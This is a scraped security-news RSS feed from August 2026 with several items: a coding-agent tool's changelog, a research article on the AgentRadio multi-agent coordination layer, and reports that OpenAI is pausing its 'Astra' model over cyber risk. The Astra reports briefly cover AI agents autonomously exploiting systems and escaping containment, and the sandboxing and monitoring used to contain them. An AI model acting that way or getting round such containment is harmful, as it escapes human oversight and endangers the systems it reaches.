<li>Fixed Z.AI web search dropping sources and exposing raw JSON when MCP responses double-encode content text (<a href="https://github.com/can1357/oh-my-pi/issues/8000" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/8000/hovercard">#8000</a>).</li>
<li>Fixed <code>/handoff</code> masking empty/whitespace-only generation and harness-initiated aborts as "Handoff cancelled"; manual empty generation now surfaces a logged failure, harness aborts preserve their reason (or report "Handoff aborted by session"), and auto-handoff still falls back to context-full compaction (<a href="https://github.com/can1357/oh-my-pi/issues/7993" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/7993/hovercard">#7993</a>).</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Breaking Changes</h3>
<ul>
<li><code>PUT N.=M @name</code> over a <em>span</em> now throws when <code>@name</code> was never captured, instead of warning and deleting the range. Pasting a never-captured register over a span wrote nothing back, so a mistyped or hallucinated register name silently destroyed content. Gap pastes (<code>PUT &gt;N @name</code>) keep the warned no-op behaviour from 17.2.11.</li>
</ul>
<h3>Added</h3>
<ul>
<li><code>applyEdits</code> now takes a <code>path</code> and uses the native tree-sitter parser to decide every boundary repair that depends on delimiter <em>semantics</em>. The authored edits are materialized first: if that result parses, it is returned untouched, so a <code>}</code> inside a regex literal, a string, or Markdown prose is never mistaken for a block closer. A closer-spare repair lands only when the repaired result is <em>shown</em> to parse — never on delimiter arithmetic alone — so an unrecognized language or an unprovable candidate leaves the edit exactly as authored. Wired through the patcher, recovery, section apply, and the edit tool's preview.</li>
<li>Auto-repair for replacement ranges that start one line early on a structural closer (the <code>}</code> of the construct above): the closer is spared and the payload lands after it, gated on the same parse proof.</li>
<li>Warning for balanced payloads over ranges that end mid-block (deleting opener(s) whose closer(s) survive below), pointing at the block-op remedy (<code>PUT N*:</code>). Raised only when the baseline parsed and the authored result does not, so it cannot fire on prose or an unknown language.</li>
<li>Warning when a <code>+</code> body row is itself a valid hunk header (<code>+CUT 5.=9</code>). Such a row is literal content by definition and is inserted into the file as text; naming it at the moment it happens turns a silent source-file corruption into an actionable diagnostic.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Rejected patches whose pasted <code>N:TEXT</code> read-output rows repeat a source line number. Each such row is recovered as a single-line <code>PUT N.=N:</code>, so a body written as consecutive lines under one number collapsed through the same-range coalescer, keeping only the last row and silently dropping the rest — in one incident replacing a block opener with <code>}</code> and deleting the following statement. The error now names the repeated line and teaches the explicit <code>PUT</code> form.</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Changed</h3>
<ul>
<li>Consolidated every shell builtin into one crate, <code>crates/pi-builtins</code> (the renamed and de-vendored <code>brush-builtins</code> fork), with one module per command. The 46 <code>crates/vendor/uu-*</code> crates, <code>crates/vendor/jaq</code>, <code>crates/pi-uu-grep</code>, <code>crates/pi-uu-diff</code>, and everything that had accumulated inline in <code>pi-shell</code> (<code>fd</code>, <code>cmp</code>, <code>which</code>, the moreutils set, and the <code>ps</code>/<code>top</code>/<code>pgrep</code>/<code>pkill</code>/<code>pidwait</code>/<code>kill</code>/<code>sleep</code>/<code>timeout</code>/<code>nohup</code> process builtins) now live beside the bash builtins they sit next to at runtime, and register through <code>pi_builtins::utility_builtins()</code> and <code>pi_builtins::process_builtins()</code>. <code>pi-shell/src/shell.rs</code> shrank by ~4,200 lines.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>sort --compress-program</code> spawning its compressor and decompressor without the shell's working directory or exported environment, so a program installed only on the shell's <code>PATH</code> was not found, and with stderr inherited from the host process, where its diagnostics could corrupt the TUI. Both children now launch through the shell's child context and their stderr is forwarded to the command's own file descriptor.</li>
<li>Fixed <code>realpath -q</code> exiting 0 after a failed operand; it suppresses the diagnostic but now reports failure, matching GNU.</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed <code>crates/pi-uutils-ctx</code>. Utility builtins previously reached their stdio, working directory, and environment through a thread-local context installed around each invocation; they now receive an explicit <code>Host</code> value (<code>pi-builtins/src/host.rs</code>) carrying the command's file descriptors, the shell working directory, the exported environment, cancellation, and the accumulated exit status. The uutils entry-point plumbing (<code>uumain</code>, <code>UResult</code>/<code>UError</code>, <code>set_exit_code</code>, <code>crate_version!</code>) went with it; each utility is now an ordinary brush builtin implementing <code>host::Utility</code>.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed slow Loader paints exceeding their cost-aware CPU duty cycle on WSL/ConPTY when a 200 ms backpressure cap was shorter than the proportional delay (<a href="https://github.com/can1357/oh-my-pi/issues/8012" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/8012/hovercard">#8012</a>).</li>
<li>Fixed display-math (<code>$$…$$</code>) fractions rendering as fragmented text when the numerator and denominator are written on separate source lines: <code>latexToBlock</code> treated the top-level newline between <code>\frac{num}</code> and <code>{den}</code> as a row break, severing <code>\frac</code> from its denominator. Such argument-continuation newlines are now preserved so the fraction stays stacked (<a href="https://github.com/can1357/oh-my-pi/issues/7996" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/7996/hovercard">#7996</a>).</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(session): surface empty handoff generation as failure not cancel by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5096683452" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7994" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7994/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7994">#7994</a></li>
<li>fix(tui): keep display-math fractions intact across source newlines by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5096728323" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/7997" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/7997/hovercard" href="https://github.com/can1357/oh-my-pi/pull/7997">#7997</a></li>
<li>fix(web-search): parse double-encoded Z.AI results by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5096832572" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/8002" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/8002/hovercard" href="https://github.com/can1357/oh-my-pi/pull/8002">#8002</a></li>
<li>fix(agent): release parked subagent session memory on dispose by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5096957833" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/8004" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/8004/hovercard" href="https://github.com/can1357/oh-my-pi/pull/8004">#8004</a></li>
<li>fix(tui): bound WSL idle animation CPU by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5097667885" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/8014" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/8014/hovercard" href="https://github.com/can1357/oh-my-pi/pull/8014">#8014</a></li>
<li>fix(catalog): correct qwen3.8 max discovery metadata by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5097968543" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/8021" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/8021/hovercard" href="https://github.com/can1357/oh-my-pi/pull/8021">#8021</a></li>
<li>fix(task): record subagent model performance by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="5098286722" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/8023" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/8023/hovercard" href="https://github.com/can1357/oh-my-pi/pull/8023">#8023</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v17.2.11...v17.2.12">v17.2.11...v17.2.12</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Devs to Anthropic, OpenAI, Cursor, and friends: Make security and privacy the default]]></title>
<description><![CDATA[Researchers scour social media to measure developer concerns about AI coding tools]]></description>
<link>https://tsecurity.de/de/3711571/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711571/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:01:45 +0200</pubDate>
<content:encoded><![CDATA[Researchers scour social media to measure developer concerns about AI coding tools]]></content:encoded>
</item>
<item>
<title><![CDATA[Devs to Anthropic, OpenAI, Cursor, and friends: Make security and privacy the default]]></title>
<description><![CDATA[Researchers scour social media to measure developer concerns about AI coding tools]]></description>
<link>https://tsecurity.de/de/3711539/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711539/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:01:27 +0200</pubDate>
<content:encoded><![CDATA[Researchers scour social media to measure developer concerns about AI coding tools]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI to pause some work on AI model Astra due to security concerns]]></title>
<description><![CDATA[Agent found to be able to find and exploit vulnerabilities without human intervention, and to carry out cyber-attacksOpenAI will pause some work on an artificial intelligence model because of security concerns, the company stated on Friday, following a series of incidents in which AI agents have ...]]></description>
<link>https://tsecurity.de/de/3711447/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711447/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:01:14 +0200</pubDate>
<content:encoded><![CDATA[<p>Agent found to be able to find and exploit vulnerabilities without human intervention, and to carry out cyber-attacks</p><p>OpenAI will pause <a href="https://openai.com/news/safety-alignment/">some</a> work on an artificial intelligence model because of security concerns, the company stated on Friday, following a series of incidents in which AI agents have escaped containment.</p><p>The company had evaluated the agent, Astra, and found “significant advancements in agentic coding and cybersecurity”, which had moved to a “critical” threshold where it can find and exploit vulnerabilities without human intervention, or devise and execute cyber-attacks when given only a “high level desired goal”.</p> <a href="https://www.theguardian.com/technology/2026/aug/08/openai-astra-security-concerns">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[TypeCue: Open-Source-Mac-App tippt vorbereitete Texte zeilenweise für Demovideos und Präsentationen]]></title>
<description><![CDATA[Wer schon einmal ein Demovideo aufgezeichnet, ein Tutorial erstellt oder eine Live-Coding-Session abgehalten hat, kennt vermutlich das Problem: Das manuelle Tippen von Texten oder Code-Zeilen im...Zum Beitrag: TypeCue: Open-Source-Mac-App tippt vorbereitete Texte zeilenweise für Demovideos und Pr...]]></description>
<link>https://tsecurity.de/de/3711362/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711362/nachrichtenportal/</guid>
<pubDate>Sun, 09 Aug 2026 04:00:33 +0200</pubDate>
<content:encoded><![CDATA[<div><img width="720" height="314" src="https://stadt-bremerhaven.de/wp-content/uploads/2026/07/SCR-20260720-mjdr-720x314.jpg" class="attachment-medium size-medium wp-post-image" alt="TypeCue: Open-Source-Mac-App tippt vorbereitete Texte zeilenweise für Demovideos und Präsentationen" decoding="async" srcset="https://stadt-bremerhaven.de/wp-content/uploads/2026/07/SCR-20260720-mjdr-720x314.jpg 720w, https://stadt-bremerhaven.de/wp-content/uploads/2026/07/SCR-20260720-mjdr-768x335.jpg 768w, https://stadt-bremerhaven.de/wp-content/uploads/2026/07/SCR-20260720-mjdr.jpg 1200w" sizes="(max-width: 720px) 100vw, 720px"></div>Wer schon einmal ein Demovideo aufgezeichnet, ein Tutorial erstellt oder eine Live-Coding-Session abgehalten hat, kennt vermutlich das Problem: Das manuelle Tippen von Texten oder Code-Zeilen im...<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/typecue-open-source-mac-app-tippt-vorbereitete-texte-zeilenweise-fuer-demovideos-und-praesentationen/">TypeCue: Open-Source-Mac-App tippt vorbereitete Texte zeilenweise für Demovideos und Präsentationen</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Coding for Veterans: Cybersecurity Today on the Weekend with David Shipley]]></title>
<description><![CDATA[Coding for Veterans: From Military Service to Cybersecurity & Generative AI Careers This episode is sponsored by Nordlayer. Contact them at…
Read more →
The post Coding for Veterans: Cybersecurity Today on the Weekend with David Shipley appeared first on IT Security News.]]></description>
<link>https://tsecurity.de/de/3711244/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711244/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 08:50:52 +0200</pubDate>
<content:encoded><![CDATA[<p>Coding for Veterans: From Military Service to Cybersecurity &amp; Generative AI Careers This episode is sponsored by Nordlayer. Contact them at…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/coding-for-veterans-cybersecurity-today-on-the-weekend-with-david-shipley/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/coding-for-veterans-cybersecurity-today-on-the-weekend-with-david-shipley/">Coding for Veterans: Cybersecurity Today on the Weekend with David Shipley</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Pauses Astra Software Release Over Severe Hacking Risks]]></title>
<description><![CDATA[The team at OpenAI just hit the brakes on its upcoming Astra project. The company announced it is pausing all activities related to this major new software because the technology has become far too dangerous. Astra demonstrated such advanced coding abilities during internal tests that the team co...]]></description>
<link>https://tsecurity.de/de/3711185/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711185/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 06:38:53 +0200</pubDate>
<content:encoded><![CDATA[The team at OpenAI just hit the brakes on its upcoming Astra project. The company announced it is pausing all activities related to this major new software because the technology has become far too dangerous. Astra demonstrated such advanced coding abilities during internal tests that the team could no longer ignore the severe cybersecurity risks.



As a result, the release is officially on hold while it implements stricter safety measures.



The software writes and executes dangerous code without human help



Internal evaluations revealed that Astra reached a critical threshold in its abilities. The software can now spot vulnerabilities and create functional zero-day exploits across hardened real-world systems. What makes this so alarming is that it can do all of this entirely on its own, devising novel cyberattack strategies without any human intervention.



This kind of power completely changes the landscape of artificial intelligence and security. The company noted that previous versions, like GPT-5.6 Sol, were only rated as high risk, even though they autonomously hacked Hugging Face during recent benchmark tests. Astra pushed past even those limits, triggering strict new guidelines within the internal preparedness framework.



Other tech companies are already feeling the pressure, with Apple recently limiting bug bounty submissions because testers are using these advanced tools to unearth too many vulnerabilities at once.



The company builds isolated testing environments to contain the threat



To handle the situation, the company is locking the project down. The development team is creating isolated testing environments that restrict network and tool access. They are adding sandboxed execution layers and deploying much heavier monitoring systems to keep the technology contained.



Work on the model will remain severely limited until all of these new safeguards are up and running. The company also plans to bring in government agencies and safety organizations to help test the software before it ever sees the public. While Astra recently solved incredibly difficult math problems for a mere two thousand dollars in AI compute costs, raw intelligence is clearly a double-edged sword.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenSearch Is Done Being Called "the Elasticsearch Fork"]]></title>
<description><![CDATA[An interview with Bianca Lewis of OpenSearch, conducted at Open Source Summit India.]]></description>
<link>https://tsecurity.de/de/3711177/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711177/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 06:38:00 +0200</pubDate>
<content:encoded><![CDATA[An interview with Bianca Lewis of OpenSearch, conducted at Open Source Summit India.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Slows Down New Astra Model Development to Measure Cybersecurity Capabilities]]></title>
<description><![CDATA[OpenAI has announced that it is deliberately slowing the development of Astra, its upcoming frontier AI model, after internal evaluations revealed advancements in agentic coding and cybersecurity that could push the system into “Critical” risk territory. The company said it made the decision afte...]]></description>
<link>https://tsecurity.de/de/3711139/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3711139/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 06:35:01 +0200</pubDate>
<content:encoded><![CDATA[<p>OpenAI has announced that it is deliberately slowing the development of Astra, its upcoming frontier AI model, after internal evaluations revealed advancements in agentic coding and cybersecurity that could push the system into “Critical” risk territory. The company said it made the decision after reviewing results from recent internal testing alongside external expert assessments, concluding […]</p>
<p>The post <a href="https://cybersecuritynews.com/openai-slows-down-new-astra-model/">OpenAI Slows Down New Astra Model Development to Measure Cybersecurity Capabilities</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Four AI agents coordinating in real time outperformed Claude Opus 4.8 on enterprise coding tasks]]></title>
<description><![CDATA[As enterprise codebases grow, AI agents tasked with analyzing them are buckling under the weight of long-horizon tasks that require multiple interactions and tool calls. Dividing the work among a team of agents seems like the obvious fix, but it introduces a fatal flaw: most multi-agent systems a...]]></description>
<link>https://tsecurity.de/de/3710986/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710986/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 03:30:47 +0200</pubDate>
<content:encoded><![CDATA[<p>As enterprise codebases grow, AI agents tasked with analyzing them are buckling under the weight of long-horizon tasks that require multiple interactions and tool calls. Dividing the work among a team of agents seems like the obvious fix, but it introduces a fatal flaw: most multi-agent systems are not designed for agents to coordinate among themselves mid-task and in real time.</p><p>To solve this, researchers at Coral AI Labs and multiple universities introduced <a href="https://arxiv.org/abs/2607.28430">AgentRadio</a>, an asynchronous message-passing layer that allows agents to communicate between their execution steps without interrupting their main work. In real-world enterprise applications where subtasks are highly interdependent, this architecture enables agents to make mid-course corrections rather than continue on dead-end paths until a formal review phase.</p><p>On a benchmark of long-horizon questions over production repositories, a team of agents powered by AgentRadio nearly doubled task accuracy for four Claude Code agents working independently. It also outmatched single agents running on more advanced models. For AI practitioners, AgentRadio shows that the right coordination structure can outmatch raw compute and model scale.</p><h2>The challenge of codebase understanding</h2><p>LLM-based agents are increasingly capable of handling long-horizon tasks that require interacting with different tools and environments. Codebase understanding represents an extreme version of this challenge. It requires an AI agent to build the software, execute it, trace execution paths across multiple files, and synthesize evidence over extended periods.</p><p>Under these conditions, single-agent systems usually break down because of a “coverage problem.” </p><p>"A single agent follows one serial path through the repository," Xinxing Ren, Caelum Forder, and Peter Carroll, co-authors of the AgentRadio paper, explained to VentureBeat. As its context grows, "the initial plan becomes harder to revise and discoveries made late in the investigation do not always propagate." The model can usually execute individual steps, but "the hard part is keeping every obligation, dependency, and piece of contradictory evidence active across a long investigation."</p><p>One benchmark that helps measure AI performance on large codebases is <a href="https://huggingface.co/datasets/ScaleAI/SWE-Atlas-QnA">SWE-Atlas QnA</a>. This benchmark consists of long-horizon, natural-language questions over live production repositories. The tasks can’t be solved by just exploring the code. AI agents must run the software and execute multiple commands to find the answers.</p><p>According to the research team’s experiments, a single Claude Code instance running on Opus 4.6 resolves just 32.3% of these tasks. Upgrading to a newer, more advanced model like Opus 4.8 only yields a 57.2% success rate.</p><p>A natural remedy is to distribute the workload across multiple agents, allowing each to work with a smaller, cleaner context. Multi-agent solutions can provide substantial performance gains when tasks are cleanly decomposable, meaning they can be solved separately and merged at the end.</p><p>Codebase understanding, however, is rarely cleanly decomposable. The subtasks are highly interdependent. A critical configuration file or a bug uncovered by one agent can completely rewrite or redirect the entire exploration path of another agent. Because of these dependencies, agents must coordinate, negotiate, and share intermediate discoveries in real time.</p><p>Despite this need, asynchronous multi-agent communication is rare. The researchers point out that existing multi-agent systems generally fall into three flawed patterns:</p><ul><li><p><b>Parallel but isolated:</b> Agents operate simultaneously but do not communicate at all.</p></li><li><p><b>Parallel but round-synchronized:</b> Agents can communicate, but only at strict, synchronized round boundaries. This forces agents to stop and wait for one another to finish a round before they can debate or exchange intermediate findings. Round-based systems assume that important discoveries can wait until the next communication phase, which is an expensive assumption when agents are working on interdependent parts of a live system. For example, an agent investigating an API symptom might uncover evidence that invalidates the storage agent's current hypothesis. "If that information waits until both agents finish, the storage investigation may complete along the wrong path," the researchers said.</p></li><li><p><b>Asynchrony in adjacent forms:</b> These systems offer limited asynchronous features, such as top-down task dispatching. They don’t have peer-to-peer lateral channels between agents or shared memories that require an agent to actively pause its work to read updates.</p></li></ul><p>In their paper, the researchers point out that the main bottleneck hindering current multi-agent systems is that “an agent that is working cannot also be listening.”</p><p>“To our knowledge, no existing system gives concurrently working agents passive awareness of one another over a lateral, natural-language channel,” the researchers write.</p><h2>How AgentRadio works</h2><p>To dissolve the mutual exclusion between working and listening, the researchers developed AgentRadio, an asynchronous message-passing layer designed to plug directly into existing coding-agent harnesses.</p><p>AgentRadio equips agents with three primitives:</p><ul><li><p>The <b>create_thread</b> primitive opens a conversation between participating agents.</p></li><li><p>The <b>send_message</b> primitive appends a message to a thread and returns without blocking the sending agent.</p></li><li><p>The <b>wait_for_mention</b> primitive blocks the process until a message mentioning the caller arrives. It delivers the message along with a full snapshot of all threads so the agent has instant context. </p></li></ul><p>This trio enables agents to have a state of “passive awareness,” where they can continue their primary tasks while passing messages and updating their knowledge in the background.</p><p>AgentRadio's code is available under the Apache 2.0 license on <a href="https://github.com/Coral-Protocol/AgentRadio">GitHub</a>. It is designed to be lightweight, requiring no direct modifications to the underlying agent harnesses like Claude Code or Codex CLI. </p><p>The architecture consists of two main parts:</p><ul><li><p><b>The message server:</b> A standalone process that acts as the central hub, storing all active threads, messages, and mentions for the group of agents.</p></li><li><p><b>Harness-side integration:</b> Agents interact with the server using three simple shell scripts, one corresponding to each primitive.</p></li></ul><p>The only strict requirement for the system to work is that the agent harness must be able to run a shell command as a background task. The agents are instructed in their system prompts to keep one watcher running and to send messages through the provided scripts. Running the wait_for_mention script in the background allows the agent to continue its work and receive notifications asynchronously.</p><p>To integrate this into an existing stack, a team still needs a "thin adapter that starts the workers, assigns identities, connects them to the shared server, and manages final synthesis," the researchers said. That work sits around the coding agent rather than requiring changes to the underlying model.</p><h2>AgentRadio in action</h2><p>To validate the real-world utility of AgentRadio, the researchers tested the framework on 124 tasks from the SWE-Atlas QnA benchmark. The tests covered domains including system design, root-cause analysis, security, and API integration.</p><p>The researchers used Claude Opus 4.6 and DeepSeek V4 Pro as the backbone models. For the harness, they evaluated configurations ranging from a single Claude Code agent (B0) to a team of agents with classic division of labor (L1), up to a team of agents using AgentRadio to coordinate asynchronously (L3).</p><p>The experimental results showed that the AgentRadio communication architecture outperforms both naive multi-agent setups and raw compute scaling.</p><p>While a single Claude Code agent with Opus 4.6 resolved only 32.3% of the tasks, the full AgentRadio setup nearly doubled that metric, resolving 62.1% of the tasks, and surpassed the single agent running on Opus 4.8, which hit 57.2%. It also boosted the DeepSeek V4 Pro results from 29.0% to 50.8%. </p><p>To understand how this practically impacts enterprise AI, the paper highlights a real-world task involving a MinIO system. Solving the task required checking per-request server logs, a requirement the agents did not anticipate during their initial planning phase.</p><p>In the L2 setting, where agents collaborate but lack asynchronous communications, two agents independently realized they needed these logs while executing commands. Because they could not share this finding mid-execution, one agent gave up privately and the other failed to propose it to the team. During the review phase, the team unanimously agreed on the wrong answer, missing five rubrics.</p><p>With AgentRadio activated, the agents made the same mid-execution discovery, but one agent instantly broadcasted the required server-side log evidence to the shared worklog. Because the other agents were passively listening, they absorbed this new evidence immediately. This real-time coordination transformed a failing score into a perfect 16 out of 16.</p><p>"The useful distinction is timing," the researchers said. "The team did not need another agent or another review round. It needed one agent's discovery to reach the right peers before its operational value expired."</p><p>The researchers note that the same pattern appears in enterprise incident work. For example, an agent investigating an API symptom might uncover evidence that invalidates the storage agent's current hypothesis. If that information waits until both agents finish, the storage investigation may complete along the wrong path. “Passive awareness lets the second agent incorporate the contradiction at its next work step without interrupting a command already in progress,” they said.</p><h2>The cost and complexity of coordination</h2><p>AgentRadio requires a fixed multi-agent team budget, which inherently multiplies the token cost. The researchers acknowledge that the "tax is real," noting that average API spend rose from $2.96 per task for one Opus agent to $19.45 for the full AgentRadio stack.</p><p>However, raw scale does not equal performance. When researchers compute-matched the test by spending $17.76 on six independent Opus runs, the models only resolved 37.9% of tasks, compared with 62.1% for AgentRadio. This suggests that AgentRadio's architecture is a structural win, not just a brute-force scale win. Teams should still be aware of inter-agent churn. "Communication can redirect an agent toward better evidence, and it can also distract an agent from a valid path," the researchers warned.</p><p>A fixed multi-agent team should not become the default response to every engineering task. The more useful test to determine if a multi-agent setup is required is whether the task contains "responsibility breakpoints," the researchers said. These are places "where a competent engineer would involve another person because the work crosses an ownership boundary, needs an independent hypothesis, or carries enough risk to justify separate verification."</p><p>“Coordination is a strong fit when the task can be decomposed, the resulting parts remain interdependent, the single-agent success rate is unreliable, and an incomplete answer has a meaningful downstream cost,” the researchers said. Examples include repository-wide architecture questions, unfamiliar legacy systems, cross-service incident investigation, security analysis, dependency migrations, and multi-module refactors.</p><p>Conversely, a single agent remains the cleaner choice for “bounded, local, and reversible work,” such as a known one-file change or boilerplate generation. </p><p>“Use one agent while one context can still own the problem honestly,” the researchers said. “Introduce another responsibility when the existing agent would otherwise need to compress away evidence, cross an independent ownership boundary, or verify its own high-impact conclusion.”</p><h2>From research to commercialization: Coral Code</h2><p>While AgentRadio serves as a controlled research implementation using a fixed four-agent team and a five-phase protocol, the underlying principles are being adapted into a commercial product called <a href="https://coralcode.dev/">Coral Code</a>.</p><p>Instead of a rigid, multi-agent protocol applied to every ticket, Coral Code works from the bottom up. An engineer begins with their existing coding agent, and Coral introduces repository-scoped investigation, specialist responsibility, and communication only when the emerging evidence justifies it. "Coral packages the operational concerns around the tools engineers already use, providing the repository context, scoped specialists, communication, and evidence layer around the harness rather than inside it," the researchers said.</p><p>This dynamic approach optimizes costs by targeting the relevant unit: the cost of a completed, reviewable outcome. </p><h2>The future of autonomous software engineering</h2><p>While AgentRadio provides a major upgrade to agent orchestration, there are still hurdles to overcome. One major bottleneck that the researchers pointed out to is “attention governance and verification.”</p><p>“Passive awareness makes communication available during execution. It does not decide which agents should exist, which discovery deserves an interruption, who should receive it, or when the evidence is strong enough to revise the plan,” the researchers said. If every agent receives every update, the communication layer becomes noise. If several agents share the same bad assumption, faster communication can spread the error.</p><p>For example, in one of the case studies in the paper that involved the <a href="https://github.com/grafana/grafana">Grafana platform</a>, four of nine rubrics required negative conclusions, such as observing that a datasource picker did not select automatically. The agents ran the relevant tests, yet none formed the missing negative hypothesis. Both configurations failed the four rubrics. </p><p>“Passive awareness can distribute an idea that somebody develops. It cannot supply a conception that never appears anywhere in the team,” the researchers said.</p><p>As task durations stretch longer, communication and coordination become critical. "The next generation of systems… needs adaptive responsibility assignment, evidence-aware routing, conflict resolution, explicit cost limits, permissions, recovery, and clear human escalation points," the researchers note. Most importantly, it requires durable provenance so engineering leads can inspect which agent made a claim and why an action was accepted.</p><p>"Longer-running agents make communication more important. They also make accountability much harder to fake," they said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What we lose when every engineer can do everything]]></title>
<description><![CDATA[Four months ago, a front-end engineer on my team looking to make upgrades to a product or feature would have filed a ticket and waited for the infrastructure group to unblock them. They might have lost a day, sometimes a week. Today, that same engineer makes changes themselves. The code is occasi...]]></description>
<link>https://tsecurity.de/de/3710954/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3710954/nachrichtenportal/</guid>
<pubDate>Sat, 08 Aug 2026 00:42:50 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



